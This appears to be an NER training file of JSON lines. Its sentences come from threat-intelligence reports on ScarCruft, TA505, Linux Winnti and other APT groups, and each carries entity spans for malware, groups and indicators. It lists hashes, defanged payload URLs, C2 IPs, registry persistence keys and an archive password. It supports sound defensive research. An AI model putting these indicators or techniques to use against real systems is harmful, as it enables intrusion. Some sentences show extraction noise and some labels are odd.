{"text": "The Konni malware was disguised as a North Korean news item in a weaponized documents ( the name of the document was “ Why North Korea slams South Korea ’s recent defense talks with U.S-Japan.zip ” ) This is not the first time we have seen an overlap of ScarCruft and DarkHotel actors .", "spans": {"Malware: Konni": [[4, 9]], "Indicator: U.S-Japan.zip": [[182, 195]], "Organization: ScarCruft": [[254, 263]], "Organization: DarkHotel": [[268, 277]]}, "info": {"id": "aptner_train_002504", "source": "aptner_train"}}
{"text": "Members from our team have already presented on the conflict of these two threat actors at security conferences .", "spans": {}, "info": {"id": "aptner_train_002505", "source": "aptner_train"}}
{"text": "We have also shared more details with our threat intelligence customers in the past .", "spans": {}, "info": {"id": "aptner_train_002506", "source": "aptner_train"}}
{"text": "They are both Korean-speaking threat actors and sometimes their victimology overlaps .", "spans": {}, "info": {"id": "aptner_train_002507", "source": "aptner_train"}}
{"text": "But both group seem to have different TTPs ( Tactics , Techniques and Procedures ) and it leads us to believe that one group regularly lurks in the other ’s shadow .", "spans": {}, "info": {"id": "aptner_train_002508", "source": "aptner_train"}}
{"text": "The ScarCruft has shown itself to be a highly-skilled and active group .", "spans": {"Organization: ScarCruft": [[4, 13]]}, "info": {"id": "aptner_train_002509", "source": "aptner_train"}}
{"text": "It has a keen interest in North Korean affairs , attacking those in the business sector who may have any connection to North Korea , as well as diplomatic agencies around the globe .", "spans": {}, "info": {"id": "aptner_train_002510", "source": "aptner_train"}}
{"text": "ScarCruft tools : 02681a7fe708f39beb7b3cf1bd557ee9 Bluetooth info harvester .", "spans": {"Organization: ScarCruft": [[0, 9]], "Indicator: 02681a7fe708f39beb7b3cf1bd557ee9": [[18, 50]], "System: Bluetooth": [[51, 60]]}, "info": {"id": "aptner_train_002511", "source": "aptner_train"}}
{"text": "ScarCruft tools : C781f5fad9b47232b3606e4d374900cd Installer .", "spans": {"Organization: ScarCruft": [[0, 9]], "Indicator: C781f5fad9b47232b3606e4d374900cd": [[18, 50]], "System: Installer": [[51, 60]]}, "info": {"id": "aptner_train_002512", "source": "aptner_train"}}
{"text": "ScarCruft tools : 032ed0cd234f73865d55103bf4ceaa22 Downloader .", "spans": {"Organization: ScarCruft": [[0, 9]], "Indicator: 032ed0cd234f73865d55103bf4ceaa22": [[18, 50]], "System: Downloader": [[51, 61]]}, "info": {"id": "aptner_train_002513", "source": "aptner_train"}}
{"text": "ScarCruft tools : 22aaf617a86e026424edb7c868742495 AV Remover .", "spans": {"Organization: ScarCruft": [[0, 9]], "Indicator: 22aaf617a86e026424edb7c868742495": [[18, 50]], "System: AV Remover": [[51, 61]]}, "info": {"id": "aptner_train_002514", "source": "aptner_train"}}
{"text": "ScarCruft tools : 07d2200f5c2d03845adb5b20841faa94 AV Remover .", "spans": {"Organization: ScarCruft": [[0, 9]], "Indicator: 07d2200f5c2d03845adb5b20841faa94": [[18, 50]], "System: AV Remover": [[51, 61]]}, "info": {"id": "aptner_train_002515", "source": "aptner_train"}}
{"text": "GreezaBackdoor of DarkHotel : 5e0e11bca0e94914e565c1dcc1ee6860 .", "spans": {"Malware: GreezaBackdoor": [[0, 14]], "Organization: DarkHotel": [[18, 27]], "Indicator: 5e0e11bca0e94914e565c1dcc1ee6860": [[30, 62]]}, "info": {"id": "aptner_train_002516", "source": "aptner_train"}}
{"text": "TA505 is Expanding its Operations In the last few days , during monitoring activities , Yoroi CERT noticed a suspicious attack against an Italian organization .", "spans": {"Organization: TA505": [[0, 5]], "Organization: Yoroi CERT": [[88, 98]]}, "info": {"id": "aptner_train_002517", "source": "aptner_train"}}
{"text": "The threat group is also known for its recent attack campaign against Bank and Retail business sectors , but the latest evidence indicates a potential expansion of its criminal operation to other industries too .", "spans": {}, "info": {"id": "aptner_train_002519", "source": "aptner_train"}}
{"text": "Dropper : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273 Excel file with malicious macro .", "spans": {"Malware: Dropper": [[0, 7]], "Indicator: 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc273": [[10, 74]], "System: Excel": [[75, 80]], "System: malicious macro": [[91, 106]]}, "info": {"id": "aptner_train_002520", "source": "aptner_train"}}
{"text": "The intercepted attack starts with a spear phishing email embedding a spreadsheet .", "spans": {}, "info": {"id": "aptner_train_002521", "source": "aptner_train"}}
{"text": "The document is weaponized with malicious macro code triggered when the user opens the document to see the content under the obfuscated view .", "spans": {"System: malicious macro": [[32, 47]]}, "info": {"id": "aptner_train_002522", "source": "aptner_train"}}
{"text": "To understand its capabilities , the macro code has been isolated and analyzed in detail .", "spans": {"System: macro": [[37, 42]]}, "info": {"id": "aptner_train_002523", "source": "aptner_train"}}
{"text": "Surprisingly , the source code is composed by more than 1600 lines of code and it is highly obfuscated .", "spans": {}, "info": {"id": "aptner_train_002524", "source": "aptner_train"}}
{"text": "Paying more attention during the code analysis , we discovered that it is full of junk instructions used to declare and initialize variables never used .", "spans": {}, "info": {"id": "aptner_train_002525", "source": "aptner_train"}}
{"text": "Only a small portion of this code is actually used to start the infection , the rest is just junk code .", "spans": {}, "info": {"id": "aptner_train_002526", "source": "aptner_train"}}
{"text": "Once the macro is executed , the malware downloads two files from “ kentona[.su ” , using an SSL encrypted communication , and stores them in “ C:\\Users\\Public ” path : “ rtegre.exe ” and “ wprgxyeqd79.exe ” .", "spans": {"System: macro": [[9, 14]], "Indicator: kentona[.su": [[68, 79]], "Indicator: rtegre.exe": [[171, 181]], "Indicator: wprgxyeqd79.exe": [[190, 205]]}, "info": {"id": "aptner_train_002527", "source": "aptner_train"}}
{"text": "Generic : aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7 Trojan ( Executable file ) .", "spans": {"Malware: Generic": [[0, 7]], "Indicator: aafa83d5e0619e69e64fcac4626cfb298baac54c7251f479721df1c2eb16bee7": [[10, 74]], "Malware: Trojan": [[75, 81]]}, "info": {"id": "aptner_train_002528", "source": "aptner_train"}}
{"text": "Trojan : 6f1a8ee627ec2ed7e1d818d32a34a163416938eb13a97783a71f9b79843a80a2 SFX ( self-extracting archive ) ( Executable file ) .", "spans": {"Malware: Trojan": [[0, 6]], "Indicator: 6f1a8ee627ec2ed7e1d818d32a34a163416938eb13a97783a71f9b79843a80a2": [[9, 73]], "System: SFX": [[74, 77]], "System: self-extracting archive": [[80, 103]]}, "info": {"id": "aptner_train_002529", "source": "aptner_train"}}
{"text": "The “ wprgxyeqd79.exe ” sample actually is a Self Extracting Archive ( SFX ) containing four files designed to be extracted in the %TEMP% folder .", "spans": {"Indicator: wprgxyeqd79.exe": [[6, 21]], "System: Self Extracting Archive": [[45, 68]], "System: SFX": [[71, 74]]}, "info": {"id": "aptner_train_002530", "source": "aptner_train"}}
{"text": "After that , it executes “ exit.exe ” which launches the “ i.cmd ” batch script .", "spans": {"Indicator: exit.exe": [[27, 35]], "Indicator: i.cmd": [[59, 64]]}, "info": {"id": "aptner_train_002531", "source": "aptner_train"}}
{"text": "This new script performs a ping to “ www[.cloudflare[.com ” for three times with a delay of 3000ms , testing the connectivity of the victim machine .", "spans": {"Indicator: www[.cloudflare[.com": [[37, 57]]}, "info": {"id": "aptner_train_002532", "source": "aptner_train"}}
{"text": "If the host is successfully reached , the script renames a file named “ kernel.dll ” , obviously not the real one , in “ uninstall.exe ” , another misleading name .", "spans": {"Indicator: kernel.dll": [[72, 82]], "Indicator: uninstall.exe": [[121, 134]]}, "info": {"id": "aptner_train_002533", "source": "aptner_train"}}
{"text": "Then it invokes the renamed executable and runs it passing a series of parameter : “ uninstall.exe x -pQELRatcwbU2EJ5 -y ”", "spans": {"Indicator: uninstall.exe": [[85, 98]]}, "info": {"id": "aptner_train_002534", "source": "aptner_train"}}
{"text": "These parameters are needed to self-decrypt the “ uninstall.exe ” file which is again another SFX archive .", "spans": {"Indicator: uninstall.exe": [[50, 63]], "System: SFX": [[94, 97]]}, "info": {"id": "aptner_train_002535", "source": "aptner_train"}}
{"text": "The “ -p ” parameter , indeed , specify the password of the archive to be extracted .", "spans": {}, "info": {"id": "aptner_train_002536", "source": "aptner_train"}}
{"text": "The crucial file , at this point of the infection , is the SFX executable named “ uninstall.exe ” .", "spans": {"System: SFX": [[59, 62]], "Indicator: uninstall.exe": [[82, 95]]}, "info": {"id": "aptner_train_002537", "source": "aptner_train"}}
{"text": "It has a structure similar to previous “ wprgxyeqd79.exe ” file : two of their files have the same name , but the content of this new SFX is extracted in the “ %ALLUSERSPROFILE%\\Windows Anytime Upgrade ” directory .", "spans": {"Indicator: wprgxyeqd79.exe": [[41, 56]], "System: SFX": [[134, 137]], "System: %ALLUSERSPROFILE%\\Windows": [[160, 185]]}, "info": {"id": "aptner_train_002538", "source": "aptner_train"}}
{"text": "Another time , the execution flow moves from “ exit.exe to “ i.cmd ” .", "spans": {"Indicator: exit.exe": [[47, 55]], "Indicator: i.cmd": [[61, 66]]}, "info": {"id": "aptner_train_002539", "source": "aptner_train"}}
{"text": "The script is quite different from the previous one : it guarantees its persistence on the victim machine through the setting of “ HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run ” registry key , creating a new entry named “ Windows Anytime Upgrade ” which points to “ winserv.exe ” , just stored into the same folder .", "spans": {"System: Windows": [[228, 235]], "Indicator: winserv.exe": [[272, 283]]}, "info": {"id": "aptner_train_002540", "source": "aptner_train"}}
{"text": "Thus , the script provides to run “ winserv.exe ” .", "spans": {"Indicator: winserv.exe": [[36, 47]]}, "info": {"id": "aptner_train_002541", "source": "aptner_train"}}
{"text": "An interesting part of the script is the continuous killing of every “ rundll32.exe ” process running into the victim machine , generates a huge amount of noise , as visible in the following process explorer view .", "spans": {"Indicator: rundll32.exe": [[71, 83]]}, "info": {"id": "aptner_train_002542", "source": "aptner_train"}}
{"text": "Anyway , just before the kill loop , the real malicious payload is executed : the", "spans": {}, "info": {"id": "aptner_train_002543", "source": "aptner_train"}}
{"text": "“ winserv.exe ” file .", "spans": {"Indicator: winserv.exe": [[2, 13]]}, "info": {"id": "aptner_train_002544", "source": "aptner_train"}}
{"text": "Analyzing it in depth , we discover it actually is the RMS ( Remote Manipulator System ) client by TektonIT , encrypted using the MPress PE compressor utility , a legitimate tool , to avoid antivirus detection .", "spans": {"System: RMS": [[55, 58]], "System: Remote Manipulator System": [[61, 86]], "System: TektonIT": [[99, 107]], "System: MPress PE": [[130, 139]]}, "info": {"id": "aptner_train_002545", "source": "aptner_train"}}
{"text": "TektonIT RMS acts as a remote administration tool , allowing the attacker to gain complete access to the victim machine .", "spans": {"System: TektonIT": [[0, 8]], "System: RMS": [[9, 12]]}, "info": {"id": "aptner_train_002546", "source": "aptner_train"}}
{"text": "Together with the RMS executable , there is another file named “ settings.dat ” containing the custom configuration prepared by the attacker .", "spans": {"System: RMS": [[18, 21]], "Indicator: settings.dat": [[65, 77]]}, "info": {"id": "aptner_train_002547", "source": "aptner_train"}}
{"text": "It contains information like : Server address and port the client will connect to ; The password chosen by the attacker for the remote access ; The ID associated to the victim client .", "spans": {}, "info": {"id": "aptner_train_002548", "source": "aptner_train"}}
{"text": "All these information are automatically loaded by the RMS executable and firstly stored in the registry key “ HKCU\\Software\\tektonik\\Remote MANIPULATOR System\\Host\\parameters ” .", "spans": {"System: RMS": [[54, 57]]}, "info": {"id": "aptner_train_002549", "source": "aptner_train"}}
{"text": "At the next startup , the software will directly load the configuration from the just created key .", "spans": {}, "info": {"id": "aptner_train_002550", "source": "aptner_train"}}
{"text": "The client establishes a new connection with the remote command and control server hosted on a Bulgarian remote host 217.12.201.159 , part of a Virtual Dedicated Server subnet of the AS-21100, operated by ITL LLC .", "spans": {"Indicator: 217.12.201.159": [[117, 131]], "System: Virtual Dedicated Server": [[144, 168]], "System: ITL": [[205, 208]], "System: LLC": [[209, 212]]}, "info": {"id": "aptner_train_002551", "source": "aptner_train"}}
{"text": "After the reconstruction of the full infection chain , we noticed strong similarities with a recent spear-phishing attack campaign against an unspecified US retail company .", "spans": {}, "info": {"id": "aptner_train_002552", "source": "aptner_train"}}
{"text": "The comparison of the infection chains reveals in both cases the attacker used a couple of SFX stages to deploy the “ RMS ” software : a legitimate remote administration tool produced by the Russian company “ TektonIT ” .", "spans": {"System: SFX": [[91, 94]], "System: RMS": [[118, 121]], "System: TektonIT": [[209, 217]]}, "info": {"id": "aptner_train_002554", "source": "aptner_train"}}
{"text": "The tool is able to grant remote access and full , direct control of the infected machine to the group .", "spans": {}, "info": {"id": "aptner_train_002555", "source": "aptner_train"}}
{"text": "Also , some code pieces are directly re-used in the", "spans": {}, "info": {"id": "aptner_train_002556", "source": "aptner_train"}}
{"text": "analyzed campaigns , such as the “ i.cmd ” and “ exit.exe ” files , and , at the same time , some new components have been introduced , for instance the “ rtegre.exe ” and the “ veter1605_MAPS_10cr0.exe ” file .", "spans": {"Indicator: i.cmd": [[35, 40]], "Indicator: exit.exe": [[49, 57]], "Indicator: rtegre.exe": [[155, 165]], "Indicator: veter1605_MAPS_10cr0.exe": [[178, 202]]}, "info": {"id": "aptner_train_002557", "source": "aptner_train"}}
{"text": "During the analysis , we also noticed the “ veter1605_MAPS_10cr0.exe ” file slightly changed run after run , a few hours after the initial discovery the infection chain dropped it with different icons , different suffix , from “ cr0 ” to “ cr24 ” , and appendix from “ veter1605_ ” to “ veter2005_ ” .", "spans": {"Indicator: veter1605_MAPS_10cr0.exe": [[44, 68]]}, "info": {"id": "aptner_train_002558", "source": "aptner_train"}}
{"text": "This may indicate the campaign is still ongoing .", "spans": {}, "info": {"id": "aptner_train_002559", "source": "aptner_train"}}
{"text": "The peculiarity of this recent attack wave is it actually hit a company not strictly in the Banking or Retail sector , as they recently did , suggesting the threat group could be potentially widening their current operations .", "spans": {}, "info": {"id": "aptner_train_002561", "source": "aptner_train"}}
{"text": "Dropurl : kentona[.su – 47.245.58.124 https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe C2: 217[.12.201.159 TA505 : 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325 TA505 : 1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b TA505 : fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0 TA505 : c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a TA505 : 5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3 .", "spans": {"Indicator: kentona[.su": [[10, 21]], "Indicator: 47.245.58.124": [[24, 37]], "Indicator: https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/ananas.exe": [[38, 101]], "Indicator: https://kentona[.su/xpepriubgpokejifuv7efrhguskdgfjn/pasmmm.exe": [[102, 165]], "Indicator: 217[.12.201.159": [[170, 185]], "Organization: TA505": [[186, 191], [261, 266], [334, 339], [407, 412], [480, 485]], "Indicator: 0c88e285b6fc183c96b6f03ca5700cc9ca7c83dfccc6ad14a946d1868d1cc27325": [[194, 260]], "Indicator: 1ee1ba514212f11a69d002005dfc623b1871cc808f18ddfa2191102bbb9f623b": [[269, 333]], "Indicator: fd701894e7ec8d8319bc9b32bba5892b11bdf608c3d04c2f18eff83419eb6df0": [[342, 406]], "Indicator: c69ce39ac3e178a89076136af7418c6cb664844b0ce5cb643912ed56c373a08a": [[415, 479]], "Indicator: 5310c2397ba4c783f7ee9724711a6da9b5c603b5c9781fff3407b46725e338b3": [[488, 552]]}, "info": {"id": "aptner_train_002562", "source": "aptner_train"}}
{"text": "Winnti : More than just Windows and Gates .", "spans": {"Organization: Winnti": [[0, 6]], "System: Windows": [[24, 31]]}, "info": {"id": "aptner_train_002563", "source": "aptner_train"}}
{"text": "The Winnti malware family was first reported in 2013 by Kaspersky Lab .", "spans": {"Organization: Winnti": [[4, 10]], "Organization: Kaspersky Lab": [[56, 69]]}, "info": {"id": "aptner_train_002564", "source": "aptner_train"}}
{"text": "Since then , threat actors leveraging Winnti malware have victimized a diverse set of targets forvaried motivations .", "spans": {"Organization: Winnti": [[38, 44]]}, "info": {"id": "aptner_train_002565", "source": "aptner_train"}}
{"text": "While the name ‘ Winnti ’ in public reporting was previously used tosignify a single actor , pronounced divergence in targeting and tradecraft betweencampaigns has led industry consensus to break up the tracking of the continued use ofthe Winnti malware under different actor clusters .", "spans": {"Organization: Winnti": [[17, 23], [239, 245]]}, "info": {"id": "aptner_train_002566", "source": "aptner_train"}}
{"text": "The underlying hypothesis is that themalware itself may be shared ( or sold ) across a small group of actors .", "spans": {}, "info": {"id": "aptner_train_002567", "source": "aptner_train"}}
{"text": "In April 2019 , reports emerged of an intrusion involving Winnti malware at a GermanPharmaceutical company .", "spans": {"Organization: Winnti": [[58, 64]], "Organization: GermanPharmaceutical": [[78, 98]]}, "info": {"id": "aptner_train_002568", "source": "aptner_train"}}
{"text": "Following these reports , Chronicle researchers doubled downon efforts to try to unravel the various campaigns where Winnti was leveraged .", "spans": {"Organization: Chronicle": [[26, 35]], "Organization: Winnti": [[117, 123]]}, "info": {"id": "aptner_train_002569", "source": "aptner_train"}}
{"text": "Analysisof these larger convoluted clusters is ongoing .", "spans": {}, "info": {"id": "aptner_train_002570", "source": "aptner_train"}}
{"text": "While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company , we identified a small cluster of Winnti samples designed specifically for Linux .", "spans": {"Organization: Winnti": [[35, 41], [118, 124]], "Organization: Vietnamese": [[57, 67]], "System: Linux": [[159, 164]]}, "info": {"id": "aptner_train_002571", "source": "aptner_train"}}
{"text": "The following is a technical analysis of thisvariant .", "spans": {}, "info": {"id": "aptner_train_002572", "source": "aptner_train"}}
{"text": "The Linux version of Winnti is comprised of two files : a main backdoor ( libxselinux ) and a library ( libxselinux.so ) used to hide it ’s activity on an infected system . ‘ libxselinux.so ’ — the userland rootkit . libxselinux.so.old : 11a9f798227be8a53b06d7e8943f8d68 906dc86cb466c1a22cf847dda27a434d04adf065 4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a IP .", "spans": {"System: Linux": [[4, 9]], "Organization: Winnti": [[21, 27]], "Malware: libxselinux": [[74, 85]], "Indicator: libxselinux.so": [[104, 118], [175, 189]], "Indicator: libxselinux.so.old": [[217, 235]], "Indicator: 11a9f798227be8a53b06d7e8943f8d68": [[238, 270]], "Indicator: 906dc86cb466c1a22cf847dda27a434d04adf065": [[271, 311]], "Indicator: 4741c2884d1ca3a40dadd3f3f61cb95a59b11f99a0f980dbadc663b85eb77a2a": [[312, 376]]}, "info": {"id": "aptner_train_002573", "source": "aptner_train"}}
{"text": "Ids.me .", "spans": {"Indicator: Ids.me": [[0, 6]]}, "info": {"id": "aptner_train_002574", "source": "aptner_train"}}
{"text": "The library used to hide Winnti ’s system activity is a copy of the open-source userland rootkit Azazel , with minor changes .", "spans": {"Organization: Winnti": [[25, 31]], "System: Azazel": [[97, 103]]}, "info": {"id": "aptner_train_002575", "source": "aptner_train"}}
{"text": "When executed , it will register symbols for multiple commonly used functions , including : open() , rmdir() , and unlink() , and modify their returns to hide the malware ’s operations .", "spans": {"System: open()": [[92, 98]], "System: rmdir()": [[101, 108]], "System: unlink()": [[115, 123]]}, "info": {"id": "aptner_train_002576", "source": "aptner_train"}}
{"text": "Unlike standard Azazel which is configured to hide network activity based on port ranges , the Winnti modified version keeps a list of process identifiers and network connections associated with the malware ’s activity .", "spans": {"System: Azazel": [[16, 22]], "Organization: Winnti": [[95, 101]]}, "info": {"id": "aptner_train_002578", "source": "aptner_train"}}
{"text": "This modification likely serves to simplify the operator ’s sample configuration process by not having to denote specific ports to hide .", "spans": {}, "info": {"id": "aptner_train_002579", "source": "aptner_train"}}
{"text": "Strings within this sample associated with the malware ’s operations are encoded using a single-byte XOR encoding .", "spans": {}, "info": {"id": "aptner_train_002580", "source": "aptner_train"}}
{"text": "The following is an example Python function to decode these strings . libxselinux.old : 7f4764c6e6dabd262341fd23a9b105a3 dc96d0f02151e702ef764bbc234d1e73d2811416 ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23 IP .", "spans": {"System: Python": [[28, 34]], "Indicator: libxselinux.old": [[70, 85]], "Indicator: 7f4764c6e6dabd262341fd23a9b105a3": [[88, 120]], "Indicator: dc96d0f02151e702ef764bbc234d1e73d2811416": [[121, 161]], "Indicator: ae9d6848f33644795a0cc3928a76ea194b99da3c10f802db22034d9f695a0c23": [[162, 226]]}, "info": {"id": "aptner_train_002581", "source": "aptner_train"}}
{"text": "Ids.me .", "spans": {"Indicator: Ids.me": [[0, 6]]}, "info": {"id": "aptner_train_002582", "source": "aptner_train"}}
{"text": "Winnti Linux variant ’s core functionality is within ‘ libxselinux ’ .", "spans": {"Organization: Winnti": [[0, 6]], "System: Linux": [[7, 12]], "Malware: libxselinux": [[55, 66]]}, "info": {"id": "aptner_train_002583", "source": "aptner_train"}}
{"text": "Upon execution , an embedded configuration is decoded from the data section using a simple XOR cipher .", "spans": {}, "info": {"id": "aptner_train_002584", "source": "aptner_train"}}
{"text": "The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report .", "spans": {"Organization: Winnti": [[89, 95]], "Organization: Novetta": [[132, 139]]}, "info": {"id": "aptner_train_002585", "source": "aptner_train"}}
{"text": "Embedded in this sample ’s configuration three command-and-control server addresses and two additional strings we believe to be campaign designators .", "spans": {}, "info": {"id": "aptner_train_002586", "source": "aptner_train"}}
{"text": "Winnti ver.1 , these values were designated as ‘ tag ’ and ‘ group ’ .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_002587", "source": "aptner_train"}}
{"text": "For context , embedded Winnti campaign designators have ranged from target names , geographic areas , industry , and profanity .", "spans": {"Organization: Winnti": [[23, 29]]}, "info": {"id": "aptner_train_002588", "source": "aptner_train"}}
{"text": "Winnti malware handles outbound communications using multiple protocols including : ICMP , HTTP , as well as custom TCP and UDP protocols .", "spans": {"Organization: Winnti": [[0, 6]]}, "info": {"id": "aptner_train_002589", "source": "aptner_train"}}
{"text": "Use of these protocols is thoroughly documented in the Novetta and Kaspersky reports .", "spans": {"Organization: Novetta": [[55, 62]], "Organization: Kaspersky": [[67, 76]]}, "info": {"id": "aptner_train_002590", "source": "aptner_train"}}
{"text": "While the outbound communication mechanisms are well documented , less attention has been paid to a feature of recent versions of Winnti we came across in the Linux variant ( as well as Windows ) that allows the operators to initiate a connection directly to an infected host , without requiring a connection to a control server .", "spans": {"Organization: Winnti": [[130, 136]], "System: Linux": [[159, 164]], "System: Windows": [[186, 193]]}, "info": {"id": "aptner_train_002591", "source": "aptner_train"}}
{"text": "This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted .", "spans": {}, "info": {"id": "aptner_train_002592", "source": "aptner_train"}}
{"text": "Additionally , the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts .", "spans": {}, "info": {"id": "aptner_train_002593", "source": "aptner_train"}}
{"text": "This passive implant approach to network persistence has been previously observed with threat actors like Project Sauron and the Lamberts .", "spans": {"System: Project Sauron": [[106, 120]], "System: Lamberts": [[129, 137]]}, "info": {"id": "aptner_train_002594", "source": "aptner_train"}}
{"text": "Initial technical information about this feature was shared by the Thyssenkrupp CERT in the form of an Nmap script that could be used to identify Winnti infections through network scanning .", "spans": {"Organization: Thyssenkrupp CERT": [[67, 84]], "System: Nmap": [[103, 107]], "Organization: Winnti": [[146, 152]]}, "info": {"id": "aptner_train_002595", "source": "aptner_train"}}
{"text": "This script identifies infected hosts by first sending a custom hello packet , immediately followed by an encoded request for host information , and then parsing the response .", "spans": {}, "info": {"id": "aptner_train_002596", "source": "aptner_train"}}
{"text": "The initial request , referred to as the helo/hello request in the Nmap script , is comprised of four DWORDs .", "spans": {"System: Nmap": [[67, 71]], "System: DWORDs": [[102, 108]]}, "info": {"id": "aptner_train_002597", "source": "aptner_train"}}
{"text": "The first three are generated by rand() and the fourth is computed based on the first and third .", "spans": {"System: rand()": [[33, 39]]}, "info": {"id": "aptner_train_002598", "source": "aptner_train"}}
{"text": "When received by a Winnti infected host , it will validate the received packet and listen for a second inbound request containing tasking .", "spans": {"Organization: Winnti": [[19, 25]]}, "info": {"id": "aptner_train_002599", "source": "aptner_train"}}
{"text": "This second request ( Encoded Get System Information Request ) is encoded using the same method as the custom TCP protocol used for communication with command-and-control servers , which uses a four-byte XOR encoding .", "spans": {}, "info": {"id": "aptner_train_002600", "source": "aptner_train"}}
{"text": "Before acting on the request , Winnti will validate the third DWORD contains the magic value 0xABC18CBA before executing tasking .", "spans": {"Organization: Winnti": [[31, 37]], "System: DWORD": [[62, 67]]}, "info": {"id": "aptner_train_002601", "source": "aptner_train"}}
{"text": "Clusters of Winnti related activity have become a complex topic in threat intelligence circles , with activity vaguely attributed to different codenamed threat actors .", "spans": {"Organization: Winnti": [[12, 18]]}, "info": {"id": "aptner_train_002602", "source": "aptner_train"}}
{"text": "The threat actors utilizing this toolset have repeatedly demonstrated their expertise in compromising Windows based environments .", "spans": {"System: Windows": [[102, 109]]}, "info": {"id": "aptner_train_002603", "source": "aptner_train"}}
{"text": "An expansion into Linux tooling indicates iteration outside of their traditional comfort zone .", "spans": {"System: Linux": [[18, 23]]}, "info": {"id": "aptner_train_002604", "source": "aptner_train"}}
{"text": "This may indicate the OS requirements of their intended targets but it may also be an attempt to take advantage of a security telemitry blindspot in many enterprises , as is with Penquin Turla and APT28 ’s Linux XAgent variant .", "spans": {"System: OS": [[22, 24]], "Malware: Penquin Turla": [[179, 192]], "Organization: APT28": [[197, 202]], "System: Linux": [[206, 211]], "System: XAgent": [[212, 218]]}, "info": {"id": "aptner_train_002605", "source": "aptner_train"}}
{"text": "Utilizing a passive listener as a communications channel is characteristic of the Winnti developers ’ foresight in needing a failsafe secondary command-and-control mechanisms .", "spans": {"Organization: Winnti": [[82, 88]]}, "info": {"id": "aptner_train_002606", "source": "aptner_train"}}
{"text": "The group has shown interest in prominent figures in the United Nations , as well as opposition bloggers , activists , regional news correspondents , and think tanks .", "spans": {"System: think tanks": [[154, 165]]}, "info": {"id": "aptner_train_002608", "source": "aptner_train"}}
{"text": "A group known by Microsoft as O NEODYMIUM is Oreportedly associated closely with O BlackOasis operations , but evidence that the group names are aliases has not been identified .", "spans": {"Organization: Microsoft": [[17, 26]], "Organization: NEODYMIUM": [[32, 41]], "Organization: BlackOasis": [[83, 93]]}, "info": {"id": "aptner_train_002609", "source": "aptner_train"}}
{"text": "BRONZE BUTLER : REDBALDKNIGHT , Tick .", "spans": {"Organization: BRONZE BUTLER": [[0, 13]], "Organization: REDBALDKNIGHT": [[16, 29]], "Organization: Tick": [[32, 36]]}, "info": {"id": "aptner_train_002610", "source": "aptner_train"}}
{"text": "BRONZE BUTLER is a cyber espionage group with likely Chinese origins that has been active since at least 2008 .", "spans": {"Organization: BRONZE BUTLER": [[0, 13]]}, "info": {"id": "aptner_train_002611", "source": "aptner_train"}}
{"text": "The group primarily targets Japanese organizations , particularly those in government , biotechnology , electronics manufacturing , and industrial chemistry .", "spans": {"Organization: government": [[75, 85]]}, "info": {"id": "aptner_train_002612", "source": "aptner_train"}}
{"text": "Carbanak : Anunak , Carbon Spider .", "spans": {"Organization: Carbanak": [[0, 8]], "Organization: Anunak": [[11, 17]], "Organization: Carbon Spider": [[20, 33]]}, "info": {"id": "aptner_train_002613", "source": "aptner_train"}}
{"text": "Carbanak is a threat group that mainly targets banks .", "spans": {"Organization: Carbanak": [[0, 8]]}, "info": {"id": "aptner_train_002614", "source": "aptner_train"}}
{"text": "It also refers to malware of the same name ( Carbanak ) .", "spans": {"Malware: Carbanak": [[45, 53]]}, "info": {"id": "aptner_train_002615", "source": "aptner_train"}}
{"text": "It is sometimes referred to as O FIN7 , but these appear to be two groups using the same O Carbanak  malware and are therefore tracked separately .", "spans": {"Organization: FIN7": [[33, 37]], "Malware: Carbanak ": [[91, 100]]}, "info": {"id": "aptner_train_002616", "source": "aptner_train"}}
{"text": "Gamaredon Group is a threat group that has been active since at least 2013 and has targeted individuals likely involved in the Ukrainian government .", "spans": {"Organization: Gamaredon": [[0, 9]], "Organization: Ukrainian government": [[127, 147]]}, "info": {"id": "aptner_train_002617", "source": "aptner_train"}}
{"text": "GCMAN is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency sevises .", "spans": {"Organization: GCMAN": [[0, 5]]}, "info": {"id": "aptner_train_002618", "source": "aptner_train"}}
{"text": "Gorgon Group is a threat group consisting of members who are suspected to be Pakistan based or have other connections to Pakistan .", "spans": {"Organization: Gorgon Group": [[0, 12]]}, "info": {"id": "aptner_train_002619", "source": "aptner_train"}}
{"text": "The group has performed a mix of criminal and targeted attacks , including campaigns against government organizations in the United Kingdom , Spain , Russia , and the United States .", "spans": {}, "info": {"id": "aptner_train_002620", "source": "aptner_train"}}
{"text": "Sandworm Team : Quedagh , VOODOO BEAR .", "spans": {"Organization: Sandworm Team": [[0, 13]], "Organization: Quedagh": [[16, 23]], "Organization: VOODOO BEAR": [[26, 37]]}, "info": {"id": "aptner_train_002621", "source": "aptner_train"}}
{"text": "Sandworm Team is a Russian cyber espionage group that has operated since approximately 2009 .", "spans": {"Organization: Sandworm Team": [[0, 13]]}, "info": {"id": "aptner_train_002622", "source": "aptner_train"}}
{"text": "The group likely consists of Russian pro-hacktivists .", "spans": {}, "info": {"id": "aptner_train_002623", "source": "aptner_train"}}
{"text": "Sandworm Team targets mainly Ukrainian entities associated with energy , industrial control systems , SCADA , government , and media .", "spans": {"Organization: Sandworm Team": [[0, 13]]}, "info": {"id": "aptner_train_002624", "source": "aptner_train"}}
